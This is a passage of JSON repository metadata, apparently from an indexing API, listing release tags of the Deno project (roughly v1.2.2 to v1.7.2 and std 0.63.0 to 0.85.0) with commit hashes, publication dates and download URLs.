ha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"htt